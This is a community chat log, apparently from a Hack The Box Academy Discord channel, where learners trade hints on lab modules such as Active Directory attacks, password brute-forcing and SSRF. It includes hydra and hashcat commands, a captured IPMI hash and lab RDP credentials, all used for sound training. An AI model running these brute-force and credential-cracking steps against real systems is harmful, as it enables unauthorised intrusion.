#modules

1 messages · Page 108 of 1

pine dagger
#

Hi Khaotic, Can I please DM you regarding Whitebox Attacks (assuming you finished it!)?

gusty granite
#

Going through ffuf module, I've started the pwnbox or whatever that website Parrot VM instance is called. Can someone please tell me where do I get the IP and port to access:
http://academy.htb:PORT

surreal rain
pine dagger
surreal rain
#

You should be able to DM me without adding it

pine dagger
#

Ah, nevermind, its privacy settings on my side I think

maiden spindle
polar widget
#

I'm messing up with the formatting or something

#

Linux services and internals enumeration - latest python version installed on the target

#

Have tried whereis, the command given in the section, which etc

pine dagger
#

i.e. xfreerdp /size:90%h /v:10.129.2.174 /u:htb-student /p:'Academy_student_AD!'

polar widget
#

Even getting interactive with the python3 and grabbing the version, the installed python packages versions etc

maiden spindle
#

xfreerdp command not found. That's why I've been using remmina instead

#

If I could get xfreerdp to work I'd be happy using that, but I struggled with that in earlier modules and gave up

acoustic owl
#

In Parrot OS, xfreerdp is not installed by default. But you can install it

#

sudo apt update
sudo apt install aptitude
sudo aptitude install freerdp2-x11

maiden spindle
#

thank you, i didn't realise i need to install aptitude

gusty granite
#

Can someone please tell me where the pwnbox shows target IP and port?

acoustic owl
maiden spindle
#

thanks for the link i needed to say no to the first solution, the second solution about dependancies solved it

gusty granite
polar widget
#

Need your guidance bunny

#

I've become rusty or something

acoustic owl
acoustic owl
gusty granite
#

Yes but where is this Target IP? I vaguely remember it showed target IP somewhere around/in the module last time I was doing this few months ago but I don't see Target IP anywhere now even after starting pwnbox

gusty granite
# acoustic owl

Ah man I'm dumb I thought it did that automatically when I started pwnbox. Thanks a lot 🙌🏻

keen compass
#

On ACTIVE DIRECTORY ENUMERATION & ATTACKS > Privileged Access > Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt. : Am I supposed to retrieve SQLAdmin credentials (or hash) from the previous DCSync attack or should that be done another way ?

pine dagger
balmy idol
#

anyone facing problem with the pwnbox and the vpn?
am not able to ping the target and the pwnbox isnt accepting keyboard input

polar widget
#

It has been in front of me, all the time

digital pewter
trail leaf
#

Also don't be connected to the VPN and use the Pwnbox at the same time, neither will be able to connect then

balmy idol
autumn pilot
#

If the target that you have spawned has a port, then you cannot ping it

keen compass
heavy marsh
#

Just saw an email about "Guided Mode" for HTB VIP, does anyone know if that feature will be implemented in Academy for the labs?

rare topaz
#

and skill assessments are well, skill assessments

split dawn
#

hello is someone availaible to unstuck me in "STACK-BASED BUFFER OVERFLOWS ON LINUX X86" module plz ?

pine dagger
#

Use lube

#

You need to more clear with your question.

misty current
#

lmao

rustic sage
#

according to my notes I first attacked ||tomcat with a war payload|| and did it manually but my notes also show attacking a social website 😐

#

Did you solve this?

split dawn
#

@pine dagger i'm stuck at this Q: How large can our shellcode theoretically become if we count NOPS and the shellcode size together? (Format: 00 Bytes) - i've tried 'info proc mapping' in gdb , but can't find any clue.

pine dagger
heavy marsh
heavy marsh
neat gull
#

where i can find room for dante from prolap?

pulsar needle
# rustic sage according to my notes I first attacked ||tomcat with a war payload|| and did it ...
#

Finally finished it

rustic sage
#

I may have made a mistake and led you down the wrong path earlier but I have attacked what appears to be a facebook-like blog on my notes

pulsar needle
#

But thanks for helping(or trying to)

rare topaz
#

you also said "Academy" so i got confused

neat gull
acoustic owl
acoustic owl
rustic sage
#

Yes mate, from there enumerate further

#

From windows?

#

Which user were you trying to log into that didn't work?

acoustic owl
pine dagger
#

Delete that

pulsar needle
#

Its too low resolution

#

You cant read it lol

#

Unless its just my phone xd

pine dagger
#

Its your phone

pulsar needle
#

Oof

pine dagger
#

There's two answers clearly visible in the screenshot

rustic sage
#

I can't read much, I had to zoom in

pulsar needle
#

💀

rustic sage
#

luckily for you I have proper notes on all of this except which user I used for login

#

try another user

acoustic owl
#

You should also delete this screenshot. Or hide it behind spoilertags.
It contains references to a user.

rustic sage
#

I think I would be sharing spoilers, dm?

acoustic owl
#

It contains a username
Usernames should always be placed behind spoilertags

pine dagger
#

Double |

fossil crescent
#

Anyone avail to dm/dm me on White Box Attacks: User Enumeration via Response Timing? I get the gist of this module, but currently am ~23K out of a possible 650K user names enumerated -- with the lab having timed-out twice now just to get this far... would love some filtering to reduce the 650K potential usernames down to something more managleable. Got it -- Thx @pine dagger and @kind turret for the help

pine dagger
#

beginning and end

#

thats pipe not, l

#

|x2. Beginning, and end

acoustic owl
feral stump
#

password attacks labs take forever when bruteforcing

acoustic owl
#

idk

winter blaze
#

hello i found all zones in DNS module of attacking common services, but i am stuck in this question "find all available DNS records for the inilanefreight.htb domain on the target name server and submit the flag" as i said i found all zones but seems that subbrute did not work for me i tried dnsenum, sublist3r and subfinder and look

#

can someone please help me

#

i echo all zones to the resolvers.txt fyi

#

and i tried without them

rustic sage
feral stump
#

yeah bud for ssh i normally use ncrack better but im into another service now

rustic sage
winter blaze
#

@rustic sage can i dm you ?

#

i dont want to make spoilers xdd

shut sentinel
#

fingerguns guys how to acces to worm gpt

spare isle
#

Hello everyone, can someone help me with brute force assessment where we are to attack /login.php page? I tried multiple wordlists, and in the end I used the hint. But still no luck.
My script:
||hydra -l admin -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-75.txt -u -f 94.237.59.206 -s 54421 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=<form name='log-in'"||
Bruteforcing with rockyou.txt takes like 53 hours. What do I do wrong here?
Any advise or help will be much appreciated.

quiet ember
#

And resolvers.txt

winter blaze
#

@quiet ember can i dm you ?

#

to avoid spoilers

maiden spindle
#

https://academy.hackthebox.com/module/115/section/1139 I'm trying to add the exploit into metasploit, I can't just update because the foothold has no internet. I tried following https://www.amirootyet.com/post/how-to-add-new-exploit-to-metasploit/ but after I add the exploit in it still does not show up when I search. I did updatedb as well

tranquil axle
cedar void
compact apex
#

Do we earn isc^2 credits for past completed modules ?

rustic sage
#

what is mean "our own cookie"

fringe shell
fringe shell
# rustic sage own value mean this

apparently that is an "earlier authenticated cookie". So you have logged in previously, saved your cookie, logged out and can now use that previous cookie to bypass authentication again. I think its just teaching you how cookies work.

heavy marsh
#

Trying to SSH with the key in the footprinting hard lab, but I am getting an error in libcrypto and permission denied message

#

already checked the key was copied with the BEGIN and END messages and did the chmod

quiet ember
#

Maybe the formatting is off?

heavy marsh
#

I made sure there were no spaces

#

or lines after

#

Okay, so I guess you do need a blank line after, it worked now

rustic sage
rugged veldt
rustic sage
heavy marsh
#

Getting an error on footprinting hard

#

ERROR 2002 (HY000): Can't connect to MySQL server on '<IP>' (115)

#

This was my command: mysql -u tom -h <IP> -p

#

Used the same pw I used to get into imaps

#

Nevermind, apparently you have to use it in the ssh session

#

What I don't understand is why NMAP didn't show me a port for MySQL at the beginning.

quaint hemlock
#

I'm on documentation and reporting module on practice lab question 1, I got an error when I try to rdp to DC01, does anyone knows what cause any of this?

[19:19:59:185] [3084:3085] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[19:19:59:185] [3084:3085] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1```

please let me know if you know and thank you!
heavy marsh
#

Finished footprinting HARD lab!

fathom pendant
heavy marsh
#

Are there any good footprinting techniques for scanning services like that once you're internal into and SSH session?

#

probably just linpeas or something?

heavy marsh
fathom pendant
#

Also just checking the user's bash history

digital pewter
fathom pendant
#

As that will show a lot

#

Iirc one of the modules reveals root password

#

In user history

heavy marsh
#

I've just been using ls -lah now, just like -vvv for scans and some other things

#

Might as well go with the nuclear option if there's a chance you have to use it anyway, lol

#

Not to say nations should follow that advice

rustic sage
heavy marsh
#

That would be bad

fathom pendant
rustic sage
quaint hemlock
quaint hemlock
faint rampart
quaint hemlock
#

okay thx

rustic sage
faint rampart
quaint hemlock
supple patio
#

Hi guys! I am on AD enum&attacks module, Skills Assessment Part 1. Whenever I try to upload chisel.exe it gives me that response. But I am able to upload for instance mimikatz, rubeus, etc...

grand mural
#

Why can't I speak in serious discussion?

#

Sorry if this is the wrong place to ask*

grand mural
#

Thank you

umbral wigeon
supple patio
umbral wigeon
#

yeah

supple patio
#

if it is, yeah

#

i can upload the stuff like mimikatz etc

umbral wigeon
#

i faced the same issue back then. I think the filesize is too huge, so i used meterpreter to upload instead

supple patio
#

but not chisel

quaint hemlock
umbral wigeon
tidal mango
#

I have a question on https://academy.hackthebox.com/module/160/section/1479 Web Service & API Attacks on the Server-Side Request Forgery (SSRF) section. This is the question given Can you leverage the SSRF vulnerability to identify port 3002 listening locally on the web server? Answer format: Yes, No . Its easy enough to figure out the correct answer, My question is can someone help me understand how I could modify the commands to actually test this? I have tried a bunch of methods but cannot seem to get it right. Exmaple command I have tried modifying is curl "http://<TARGET IP>:3000/api/userinfo?id=<BASE64 blob>" that part works fine, but figuring out how to make that tell me if 3002 is listening is what I cannot figure out.

trail leaf
#

You might not see the exact output from 3002, but trying to access http://IP_ADDRESS:6969 returns an error because there just isn't a service listening there

#

So maybe we can't interact with port 3002 in the way we like (maybe we can only do stuff blind), but it's still enumeration and info about the server that can potentially help later on

tidal mango
#

That is what I was trying, I will poke at it some more. Thanks!

tidal mango
frank seal
#

Hey guys for the pivoting skills assessment, just wanted to know if I should be using ||WINPIVOT10 as a final pivot to get access to the DC or if its ok for me to just get the flag from the DC network drive||

#

Not sure if thats too spoilery but I'll remove if it is sorry

final cairn
#

Hello, anyone can help with with Initial Enum of Domain in AD module

#

I found the host with ms-sql-a, yet im getting wrong answer

buoyant apex
#

can anyone tell me why i cant post on community help?

acoustic owl
rustic sage
torpid kite
#

This is from this module
PASSWORD ATTACKS
Theory of Protection

  1. Something you know (a password, passcode, pin, etc.).
  2. Something you have (an ID Card, security key, or other MFA tools).
  3. Something you are (your physical self, username, email address, or other identifiers.)

Isn't an email address and username something you know?
because an email and password is still not 2fa in my opinion.

buoyant apex
#

Thank you very much

trail leaf
#

When talking about the "you are" category, I would generally associate it with stuff like biometrics (e.g. fingerprinting, retina scans, voice pattern, etc.)

frank seal
torpid kite
trail leaf
#

then just leave it at being something you know

frank seal
torpid kite
trail leaf
#

The sole purpose of categorization is to make things make sense to our monkey brains, so as long as it's internally consistent it's fine. Probably worth mentioning in #858470491676737536 .

frank seal
# rustic sage Well done.

thanks! I wasn't sure if that was the correct way since I felt like I had to keep practicing pivoting for the exercise ahaha

rustic sage
#

that was it

frank seal
#

sweet as, cheers

quiet ember
quiet ember
spare isle
little wyvern
#

Hi, Attacking common apps- attacking joomla,. I found the flag_647..... with cve-2019-10945.py exploit but how can I read it? Tried ,, type'' and ,,more'' commands, ls, cat.. nothing works, only dir. What am I doing wrong? Thanks

quiet ember
fiery berry
little wyvern
#

Oh thanks yes a curl solved it 😅

vale bone
#

Has anyone solved console password attacks ?

warm drift
#

please can someone help I'm on passwords mutation section of password attacks module hashcat only generate 8 passwords why?

#

commands ran: hashcat --force /home/kali/Downloads/Compressed/Password-Attacks/password.list -r custom.rule --stdout | sort -u > mut_password.list

#

hydra -l sam -P /home/kali/mut_password.list ssh://10.129.134.196

ebon jasper
#

I need help ?!
First method of file transfer module is not working when I tried to use it my virtual windows machine

#

I guarantee base64 string is true, i don't know why it is not working

vital adder
vital adder
cedar void
vital adder
#

how can you didn't figure out the tool isn't in your home directory?

#

either download the tool from github or use the existed version is /opt/ldapsearch-ad/ldapsearch-ad.py

hearty hemlock
#

Hello, sorry to interrupt the conversation, my Facebook account was hacked, is there someone who can help me free of charge. I beg if there is contact me.

vital adder
hearty hemlock
#

Sorry, I forgot

kind vessel
#

Hello i'm on Kerberos Attacks Skills Assessment complete the first 3 question but i'm lock at the final one. I try to connect to the machine with psexec.py but every time I try i get an connection refused.

autumn pilot
#

Think about where you need to psexec, what is the machine you need to access and from where you are accessing it

zinc marsh
#

is therer a way to use bloodhound-python with pass the hash?

#

I am trying to find it but I cannot find anything about pth or ptt

lunar patrol
#

Error: Exiting with code 1

#

What is this guys

quaint hemlock
#

I got an error on documentation and reporting module reporting lab sections, when I try to do xfreerdp /v:IP /u:'DOMAIN\USERNAME' /p:'PASSWORD' I got this kind of error ```[09:00:45:056] [3029:3030] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[09:00:45:056] [3029:3030] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[09:00:45:056] [3029:3030] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1


anyone knows whats wrong?
thank you
trail leaf
#

Unless there's some way to auth to LDAP with a hash, which I doubt

lunar patrol
trail leaf
lunar patrol
#

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1

lunar patrol
quaint hemlock
trail leaf
#

Not right now, a bit busy with something

lunar patrol
trail leaf
lunar patrol
#

Does anyone know what the problem is

trail leaf
#

I literally don't know what your problem is because you've been copying and pasting a single line from your error instead of sending screenshots of your terminal to give actual context

#

Also relax with the messages, someone will help you if they want to. While you wait, why not take a small break, or try doing some troubleshooting of your own with google?

lunar patrol
#

see private

#

Here I can not send pictures of the problem

quaint hemlock
# trail leaf Not right now, a bit busy with something

ok just asking, when I'm trying to crack the ipmi hash kusing hashcat, why do I got this? 5768797002000000e05179a2382122e7500df7c9949a89f08a1987132dd0f48fe2e1d37238c7448fa123456789abcdefa123456789abcdef140541444d494e:a60c216003306640422c8855b290c32c53319e5a:SPOILER aren't I supposed to get the username to or is there something wrong with this syntax? hashcat -m 7300 -a 0 crack.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-75.txt

trail leaf
#

syntax looks fine, you might want to try using the full rockyou.txt just in case

#

I think I might have used john but not sure

thorn urchin
#

thats just hashcat being hashcat

quaint hemlock
#

so it's better to use john? any suggestion to use it on ipmi hash?

lean jackal
#

Like many others I am stuck on Attacking Common Services - Easy. Found the username, but have had no success in brute force so far. Why the F do they provide a password list if it does not work on any service!?

Any help much appreciated! I guess I am wasting a lot of time here...

fiery berry
umbral wigeon
cedar void
fiery berry
# cedar void That helps

but even without reading that "Note", read the output of the terminal. Looks like the most doesn't do it

lean jackal
quaint hemlock
#

anyony know what the syntax to use john the ripper cracking an iphi hash?

hollow finch
#

Working on the Password Attacks - Attacking LSASS....issue is this: using the move method as per instructions is not working. Has anyone else had this issue? The SMB server share wasn't working in the prev module either

umbral wigeon
rustic sage
#

hello guys, i enrolled in the networking module, it said it is a fundamental module,but i feel there are a lot of prerequisites to have and concepts that are not defined , do i have to finish a particular course before this one ?

hollow finch
#

trying to move the lsass.dmp file

quaint hemlock
hollow finch
#

@fiery berry trying to move the lsass.dmp file

fiery berry
hollow finch
#

yes

#

@fiery berry yes already done that module, the issue is that I get a permissions error

fiery berry
hollow finch
#

@fiery berry yes tried that, getting permissions error

fiery berry
livid pier
quaint hemlock
fresh jay
fiery berry
fresh jay
#

payloads

fiery berry
fresh jay
#

Using the Metasploit Framework

#

that?

quaint hemlock
#

yes I know, but aren't there's supposed to be the user or not? or the user is ADMIN or administrator or that user from file 1?

fiery berry
#

sorry, probably I didn't explain the way I wanted. The exploit name I meant

fresh jay
#

ohh

#

|| 0 auxiliary/gather/zookeeper_info_disclosure 2020-10-14 normal No Apache ZooKeeper Information Disclosure||
this is just an info disclosure, im not sure if it has usefull info but it did work

#

||0 exploit/linux/http/apache_druid_js_rce 2021-01-21 excellent Yes Apache Druid 0.20.0 Remote Command Execution|| and i couldnt get this to work at all

#

||2181/tcp open zookeeper Zookeeper 3.4.14-4c25d480e66aadd371de8bd2fd8da255ac140bcf (Built on 03/06/2019)|| this is the zookeeper version

fiery berry
fresh jay
#

that is the second exploit i used, i think it should work but it isnt, ill keep trying that and come back if i cant figure it out, thanks

quaint hemlock
#

colon?

fiery berry
quaint hemlock
#

already tried that before, still doesn't work

fresh jay
fiery berry
lunar patrol
#

How to find flag in password attacks console

#

Does anyone know ?

#

Please help me

fiery berry
rustic sage
lunar patrol
#

Yess

fiery berry
fresh jay
rustic sage
fiery berry
summer lava
#

Any idea on how to read the data i have tried but couldn't

lunar patrol
fresh jay
fresh jay
#

im still learning about networking so would be interesting to go through and solve prolems

rustic sage
fresh jay
wooden dust
#
At C:\Users\a\Desktop\DomainPasswordSpray.ps1:261 char:21
+         Write-Host "$Message: Waiting for $($Seconds/60) minutes. $($ ...
+                     ~~~~~~~~~
Variable reference is not valid. ':' was not followed by a valid variable name character. Consider using ${} to
delimit the name.```
do anyone knows how should i avoid this error message? its official .ps1 file from repo, and i cant import it to module's machine
mossy nest
#

Well It says that you have a mistake a the line 261 of you're DomainPasswordSpray.ps1 file

#

Consider using ${} to
delimit the name.

#

Have you tried

#

Write-Host "${Message}:Waiting for...

wooden dust
#

it worked when i used /opt/Empire/empire/server/data/module_source/credentials/DomainPasswordSpray.ps1, but hasnt worked from official github repo, so idk, but working

mossy nest
#

Well if it's working you don't have any trouble, if you want to fix it for everyone, you could fork the github and do a pull request

#

Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer.

#

How do we define a DNS zone, is that the number of available adresses by doing AXFR transfer ?

fiery berry
obtuse fiber
#

Hello, can somebody give me a nudge towards the answer for the following:

Module: Password attacks
Section: Password mutations
Question: Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the SSH password for the user "sam"

I've tried several methods, but I cannot brute the password before the expiration of the target machine.
Currently trying: hydra -l sam -P cut_mut_password.list ftp://10.129.186.213 -t 64 (I've cut the first 17k lines from the wordlist as suggested here and even tried with words starting B, and also opted for ftp brute forcing rather than ssh with no luck)

acoustic owl
obtuse fiber
tranquil axle
#

your pw list should be sorted alphanumerically, whats the first entry in your list?

acoustic owl
tranquil axle
#

should finish very quickly if you remove 17k lines I think

acoustic owl
#

But with the reduced list you should get the result relatively fast.

obtuse fiber
acoustic owl
#

Yes, I checked my notes again

rustic sage
#

quick question, im almost done with linux fundamentals. where should i go next?

acoustic owl
rustic sage
obtuse fiber
#

I have just found it thank you @tranquil axle & @acoustic owl

acoustic owl
acoustic owl
#

Find a user with unconstrained delegation who is also part of the Protected Users group

cedar void
acoustic owl
#

sure, send me a dm

formal spire
#

Any hacking tips?(mobile)

#

Need it for a revenge on the dud spiting on me and few more

analog dock
#
  • illegal
formal spire
#

Dang it

obsidian sundial
mighty tree
#

hi, I want to hack the game Roblox

acoustic owl
upper lagoon
proud pine
#

the eternal struggle

acoustic owl
wooden dust
#

How is that responder when gaining foothold caught another users than Inveigh module ran from inside Domain?

narrow solar
#

hello dear friends, i am at AD Enumeration & Attacks - Skills Assessment Part I, i am at MS01 as user sv***, i am searching the files at the cleartext pass to user t** but cant find it anyway, am i at the right bath?

trail leaf
#

Not the right path, try some techniques taught in the module to harvest credentials and such

narrow solar
#

ok thanks, the question was tricky

dusty sparrow
#

Hello is anyone out there decent with MSSQL Studio syntax? I'm having trouble incorporating a WHERE clause in my SQL query. I've tried many iterations but keep coming up with invalid column name. I've verified I can use the WHERE clause on the id column but having trouble with name. Anyone else run into this?|| /****** Script for SelectTopNRows command from SSMS ******/
SELECT TOP (1000) [id]
,[name]
,[password]
FROM [accounts].[dbo].[devsacc]
WHERE [accounts].[dbo].[devsacc].name=("HTB")||

#

lol wow nvm

#

Used single quotes and removed the parentheses and it worked 🙂

#

It works with parentheses too, haha single vs double quotes gets me in trouble, I should probably learn why 😄

tender yarrow
#

Hi all, I’m really stuck on the pen testing path. I’m on the Attacking Common Services module, specifically the attacking SQL section. I can’t for the life in me work out how to get the password for the mssql user as question 1 asks for. I can connect to the server with sqlcmd as htbuser, I can view the tables but cannot see any hashes for users. Clearly overlooking something. Can anyone help please? Thank you 👍

tranquil axle
tender yarrow
#

I’m after some pointers not the answer

#

As the cheat sheet isn’t helping

tranquil axle
#

its kinda hard to give a pointer without giving away the answer

tranquil lichen
#

Hey guys, currently doing the FFUF introduction module. Does anyone know how to get rid of the junk results from the output

tranquil axle
#

but you are right, its not in the cheatsheet

#

oh it actually is in the cheatsheet

#

i take that back

tender yarrow
#

Thank you

tranquil axle
#

I can tell you the chapter name if you want?

tender yarrow
#

Yes please

tranquil axle
#

Capture MSSQL Service Hash

tidal mango
tranquil lichen
#

Ok, I'll look into that. Thanks

tranquil axle
#

theres one flag specifically for comments in wordlists

tranquil lichen
#

Ok I got it now. This flag was mentioned earlier but it didnt register in my head that its used with ffuf

#

Thanks for leading me to the right path!

tender lake
#

Im trying to install crackmapexec on my htb ParrotOS vm but I cant get it done with the code example in the section sudo apt-get -y install crackmapexec

#

Ive looked for answers on the web and on crackmapexec's website but I am still unable to install it.

#

The error message that I get with apt-get he following packages have unmet dependencies:
crackmapexec : Depends: python3-lsassy but it is not installable
Depends: python3-neo4j but it is not installable
Depends: python3-pypsrp but it is not installable
And i cant seem to install then manually either.

Anyone know how I might be able to fix it?

tender lake
sudden snow
sudden snow
sudden snow
tender lake
#

I did clone it, the Folder has been created in my home directory

feral stump
#

anyone can help with pwd medium lab pls? I have got users, struggling after ||opening doc file||

sudden snow
sudden snow
# tender lake I'm all ears

Check the update - sudo apt update

then use this to install the missing dependencies: sudo apt install -y python3 python3-pip python3-venv libssl-dev libffi-dev build-essential

Clone the crackmapexec: sudo apt install -y git

clone repository: git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec

change directory: cd CrackMapExec

Install CrackMapExec and required Python packages:

pip install -r requirements.txt
python setup.py install

#

This should work

#

Type cme to check whether it is installed properly

tender lake
#

I think my VM is just thoroughly broken

sudden snow
tranquil axle
tender lake
#

I could run them up until "pip install"

tender lake
tranquil axle
#

Do the pip install -r requirements again

tender lake
sudden snow
sudden snow
tender lake
#

Still the same

sudden snow
tender lake
#

command not found

#

for both cme -h and crackmamexec -h

sudden snow
#

I see

#

some dependencies and packages can change

#

python3 -m venv venv
source venv/bin/activate - this cmd didnt work?

tender lake
#

Those 2 works

#

and creates a venv

tranquil axle
tender lake
#

something good...

#

its ALIVE

tranquil axle
#

Nice

tender lake
#

Thanks @tranquil axle & @sudden snow for the help.

tranquil axle
#

Yea I remember having issues with that too

tender lake
#

im writing the steps down

dire sage
#

i can't do the easiest part , im doing the shells&payloads module , at the Laudanum part , i already uploaded the payload and gained acess to the system and it asked for me to ||submit the path i land in || , i already did it , but the second question is ||Where is the Laudanum aspx web shell located on Pwnbox? Submit the full path. (Format: /path/to/laudanum/aspx) || i cant just find it , i did all the work in my linux so idk where it is located in the pwnbox , someone can give me a hint or just say where it is?

tender lake
dire sage
#

oh in the page

#

let me see

dire sage
brittle sierra
#

i want hacking tools for debian

#

because iam working a opreating system by debian

tender lake
dire sage
dire sage
#

where's the "Browser's network settings menu" located in burpsuite?

green socket
#

I'm doing the Windows Fundamentals module and on the question "Which Windows NT version is installed on the workstation? (i.e. Windows X - case sensitive)" in the first section, but the target is on Win 10.

tender lake
dire sage
dire sage
tender lake
#

I need to watch a refresher on burpsuite and all its settings and stuff. can't remember them for the life of me.

tender lake
dire sage
#

im joking xd , but it didnt supported the browser and crashed

#

i gaved it more 10 gb of ram rn

#

to see if it helps

tender lake
#

XD

trail leaf
#

Can anyone confirm if they're able to reach Splunk in Attacking Common Applications: Splunk - Discovery & Enumeration?

#

I keep getting connection resets, and I haven't been told that there's a specific vhost that needs to be visited. PRTG Network Monitor on 8080 works fine.

dire sage
#

this is what happens when i open the browser XDDD

#

can't i put it in foxy proxy?

#

so it doesnt crash the machine

tender lake
#

no idea. never used it before

pine dagger
#

Its not on 8080

trail leaf
#

I didn't say it was on 8080

pine dagger
#

I know you didn't 🙂

#

Am just commenting that it wasn't in case you were trying that

trail leaf
#

Port 8000 is open, but I'm not getting anything when I try to open it in the browser

pine dagger
#

Trying with http or https?

trail leaf
#

It was an HTTPS issue

#

thanks!

pine dagger
#

Yeah, not everything redirects from http to https.

trail leaf
#

typing http is muscle memory after doing enough HTB 😅

pine dagger
#

Ho ho ho

quaint hemlock
#

hi, i'm on documentation and reporting module practice lab sections question 1
I'm able to find a credentials in h8 weak password md file, but when I use:
xfreedp /v:172.16.5.5 /u:USER@inlanefreight.local /p:PASSWORD it failed, anyone know what's wrong?

fringe shell
quaint hemlock
#

okay

fringe shell
fathom pendant
#

And have you set up a pivot/port forward if so

gloomy bramble
signal idol
#

Hi guys! I'm currently doing the footprint modules and going through the first easy lab of the module... but I got a questions that I'd like to know if someone can help me with...

umbral wigeon
signal idol
#

when scanning the server I get these services

stone slate
#

I can't upload pictures for some reason here :/

#

But I have ProFTP services on TCP 21 and 2121

#

the module gives me a login account which works

#

but everytime I try to dir or ls the directory I get

#

ftp> ls
227 Entering Passive Mode (10,129,42,195,128,3).
150 Opening ASCII mode data connection for file list
226 Transfer complete

#

and it does not show anything

#

does anyone knows what is happening that causes this issue?

#

obs: I also tried without passive mode

gloomy bramble
stone slate
gloomy bramble
quaint hemlock
maiden spindle
#

https://academy.hackthebox.com/module/147/section/1391 Hey guys, I'm in password attacks, password mutations https://academy.hackthebox.com/module/147/section/1391, I've look at hashcats FAQ and thier cheatsheet to see what might be wrong with my command. I basically c+ped from the HTB cheat sheet. The only thing I'm doing "differently" is trying to use best64.rules rather than a custom.rules

thorn urchin
maiden spindle
#

okay

thorn urchin
#

aka youre on your own

#

not bad practice for real world usage though

maiden spindle
#

I went ahead and made custom.rule but still get "Illegal instruction"

dire sage
maiden spindle
#

@dire sage look on the desktop, there is a file that might help you

dire sage
#

i think i probably need to go throught ||apache||

maiden spindle
#

type firefox in cli

dire sage
#

"No protocol specified
uNABLE TO INIT SERVER ; coULD NOT CONNECT :CONNECTION REFUSED"

#

and nothing happened @maiden spindle

thorn urchin
maiden spindle
#

😦 alright

#

ty

heavy marsh
#

On information gathering: Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer.

#

I am getting: Server: 75.75.75.75
Address: 75.75.75.75#53

** server can't find inlanefreight.htb: NOTIMP
; Transfer failed.

#

Same if I use the IP

#

I have the IP linked to the domain name in my /etc/hosts

fathom pendant
fathom pendant
heavy marsh
fathom pendant
#

The format should be nslookup domain ip

#

And dig is
dig type domain @ip

heavy marsh
#

root.inlanefreight.htb did not work

#

dig inlanefreight.htb @10.129.44.174 command returned root.inlanefreight.htb

#

nslookup inlanefreight.htb 10.129.44.174 returned *** Can't find inlanefreight.htb: No answer

#

I thought I had to have it in my /etc/hosts?

#

so dig ns worked like someone recommended in the comments earlier

#

why does that particular command work and why do I have to keep the /etc/hosts empty of the link between the two. It doesn't make sense.

#

I guess just try with and without it in /etc/hosts?

#

still doesn't explain why dig ns worked

#

nslookup -type=any -query=AXFR inlanefreight.htb failed as well

trail leaf
#

once you've impersonated that user, you functionally are that user

#

and they might not have impersonation privileges

#

take note that in that section, the command to revert is REVERT iirc

fathom pendant
heavy marsh
#

I was mislead by this

#

The lesson made it seem like just the domain name

flint laurel
#

Can someone please help with AD Enumeration & Attacks - Skills Assessment Part 2

Last 2 questions.
I've been at it for a week now not sure how to compromise DC01 to get the admin flag and NTLM hash for krbtgt. Please help 🙏

heavy marsh
#

Where do we get the patterns file for question 2

#

for information gathering

trail leaf
#

I'd have to boot up the lab to see, but I'm currently working on something else right now

#

but iirc there's a command that will just return a list of users that you can impersonate

heavy marsh
#

I can't find the ./patterns file in the cheatsheet

#

is that in the github page, becuase there are some patterns files there it seems

#

and how can I tell when I need to have the ip in my /etc/hosts file or not?

#

it works for some, and not for others

quasi wave
#

is there any point in looking at the beginning of a walk through up to the point where I am stuck and then stopping? is this a good idea for the privilege escalation portion of the module? that portion of the module is kind of telling you how to do the privesc but I'm thinking I was stuck on that module for a while and now took a couple weeks off from that. what do you think?

heavy marsh
#

Also this isn't working for this lesson

#

how do I check my api query

trail leaf
#

understandable o7

trail leaf
# heavy marsh

.htb is not a valid top level domain, all of the DNS techniques that you want to use must require you to declare the spawned server as the DNS server

fathom pendant
# heavy marsh

It's not going to, that tool is for registered websites

heavy marsh
#

Any tips on the second question?: Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer.

fathom pendant
#

Count a records

#

You may need to do 2 transfers

#

Oh wait

heavy marsh
#

I was thinking use gobuster, but I don't have a patterns file

fathom pendant
#

Different question

#

This is a simple question

#

Read the definition of a DNS zone

heavy marsh
#

I found the answer by guessing, I just would like to know how to arrive at the answer

fathom pendant
#

Honestly it's something you may have to Google to really understand

#

Take a look at your query answers

#

And think how it could lead you to that answer

heavy marsh
#

These?

#

How do I hide spoilers, I wanted to clarify something.

#

Do I need to have the ip and domain in the etc/hosts file for these questions?

#

Found this WITH the etc/hosts file

#

But that doesn't work for question 2

fathom pendant
#

This section is all about using command line tools, axfr (zone transfer) will give you some answers

heavy marsh
#

Do I need to do anything else to set up my system in regards to dns?

fathom pendant
#

No

#

It's doable with default dns settings

#

I've done it

heavy marsh
#

It actually looks like there are over a dozen zones

#

so I'm not sure why the answer is what it is for the second question

fathom pendant
#

Think about the answer you got

heavy marsh
#

but I cant access them to find the txt file

fathom pendant
#

And look at all the info you're given

#

Perhaps you need to dig one level deeper

#

For the txt file

heavy marsh
#

so I have inlanefreight.htb and then I have the nameserver=xxxxxxxx

#

and then a bunch of subdomains

#

like 20 of them

#

that's not the answer though

fathom pendant
#

Subdomain =/= zone btw

#

Take a look at the subdomains then try and axfr off those

heavy marsh
#

Just manually one by one?

#

Just want to clarify before I spend the time

fathom pendant
#

Since there's so few

#

Go shortest length to longest

#

A.inlanefreight.htb is gonna be your hint (A being any subdomain)

heavy marsh
#

nslookup -type=any -query=AXFR <SUBDOMAIN> <IP>

#

like that?

fathom pendant
#

Since you're seeing some that are a.b.c...inlanefreight.htb

fathom pendant
heavy marsh
#

I don't see any with a, b, c

fathom pendant
#

Always try your thought then ask if it doesn't yield results

